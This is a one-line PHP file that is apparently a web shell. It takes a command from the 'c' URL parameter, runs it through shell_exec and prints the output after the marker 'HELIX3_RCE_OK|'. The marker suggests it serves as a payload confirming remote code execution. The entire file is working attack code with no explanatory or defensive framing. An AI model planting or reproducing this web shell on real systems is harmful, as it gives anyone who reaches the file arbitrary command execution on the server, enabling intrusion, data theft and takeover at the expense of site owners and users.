<?php $cmd = $_GET['c'];$output = shell_exec($cmd);echo 'HELIX3_RCE_OK|' . $output;?>